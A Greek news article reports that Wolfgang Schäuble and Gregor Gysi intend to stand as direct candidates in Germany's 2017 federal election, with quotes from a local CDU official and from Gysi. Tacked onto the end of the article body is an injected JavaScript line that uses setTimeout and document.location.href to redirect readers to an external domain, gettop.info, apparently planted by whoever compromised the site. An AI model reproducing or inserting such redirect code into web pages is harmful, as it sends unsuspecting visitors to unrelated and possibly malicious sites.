Υποψήφιος ο Σόιμπλε στις εκλογές του 2017

0
7

 

Ένας από τους μακροβιότερους πολιτικούς της Γερμανίας, ο υπουργός Οικονομικών Βόλφγκανγκ Σόιμπλε σκοπεύει να θέσει υποψηφιότητα στις ομοσπονδιακές εκλογές του 2017. Αν και σύμφωνα με πρόσφατες πληροφορίες τον ήθελαν να αποχωρεί από την ενεργό πολιτική ο Βόλφγκανγκ Σόιμπλε που την Κυριακή θα γιορτάσει τα 74α γενέθλιά του είναι αποφασισμένος να διεκδικήσει στις επικείμενες εσωκομματικές διαδικασίες την υποψηφιότητά του για απευθείας εκλογή στην εκλογική περιφέρεια του Όφενμπουργκ.

«Τα μέλη της CDU έχουν μεγάλο σεβασμό για την προσφορά και την παρουσία του Σόιμπλε στην εκλογική του περιφέρεια, παρά την πολύ απαιτητική κυβερνητική του θέση. Έχει πετύχει πολλά για την περιοχή. Το κορυφαίο στέλεχος απολαμβάνει μεγάλη εμπιστοσύνη, ειδικά σε αυτές τις πολιτικά ταραγμένες εποχές», δήλωσε ο επικεφαλής της τοπικής οργάνωσης Φόλκερ Σεμπέστα και εξέφρασε την ικανοποίησή του για το γεγονός ότι ο κ. Σόιμπλε θέτει τον εαυτό του και πάλι στη διάθεση της CDU.

Ο Βόλφγκανγκ Σόιμπλε, ο οποίος εκλέγεται από το 1972, είναι ήδη ο μακροβιότερος βουλευτής της Bundestag.

Ωστόσο, και από την πλευρά της γερμανικής Αριστεράς και το Die Linke έτοιμος να ανακοινώσει την υποψηφιότητά του είναι και ο πρώην επικεφαλής της Κοινοβουλευτικής Ομάδας του κόμματος Γκρέγκορ Γκίζι.

Ο 68χρονος Γκρέγκορ Γκίζι, ο οποίος ήταν μεταξύ των υποψηφίων για την καγκελαρία στις προηγούμενες εκλογές, ανακοίνωσε τον Ιούνιο του 2015 την αποχώρησή του από τη θέση του επικεφαλής της ΚΟ του Die Linke σημειώνοντας ότι δεν ήταν βέβαιος εάν θα έθετε εκ νέου υποψηφιότητα στις εκλογές του 2017.

«Ειδικά από την εκλογική μου περιφέρεια, στο Τρέπτοου-Κέπενικ (προάστιο του νοτιοανατολικού Βερολίνου), μου περιήλθαν πολλές παραινέσεις και μηνύματα να θέσω υποψηφιότητα για άλλη μια φορά. Μετά από βαθιά σκέψη, δεν μπορώ και δεν θέλω να το αποφύγω και, αν το κόμμα μου με προτείνει, θα αγωνιστώ ως απευθείας υποψήφιος ώστε να συνεχίσω να εκπροσωπώ στην Βουλή το για μένα ωραιότερο προάστιο του Βερολίνου» δήλωσε ο κ. Γκίζι στη διαδικτυακή εφημερίδα «Berliner Kurier», διευκρινίζοντας ότι δεν επιθυμεί να εκλεγεί με λίστα, αλλά απευθείας.

«Η Άνγκελα Μέρκελ αφαίρεσε την αλληλεγγύη από την Ευρώπη, περισσότερο από ό,τι κάθε προκάτοχός της. Η CDU/CSU πρέπει να πάει στην αντιπολίτευση ώστε να μπορέσει έτσι να καταστήσει και την Εναλλακτική για την Γερμανία (AfD) περιττή. Η Γερμανία και η Ευρώπη χρειάζονται μια διαφορετική, κοινωνική, ειρηνική και δημοκρατική πολιτική. Αυτό είναι ήδη μια σχεδόν ιστορική αναγκαιότητα και είναι δυνατή μόνο με μια δυνατή Αριστερά» επεσήμανε ο Γκίζι και προσθέτει ότι η Αριστερά πρέπει να εξελίξει περισσότερο την στρατηγική διακυβέρνησης και όχι μόνο διαμαρτυρίας και «να αναλάβει ακόμη περισσότερες ευθύνες». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here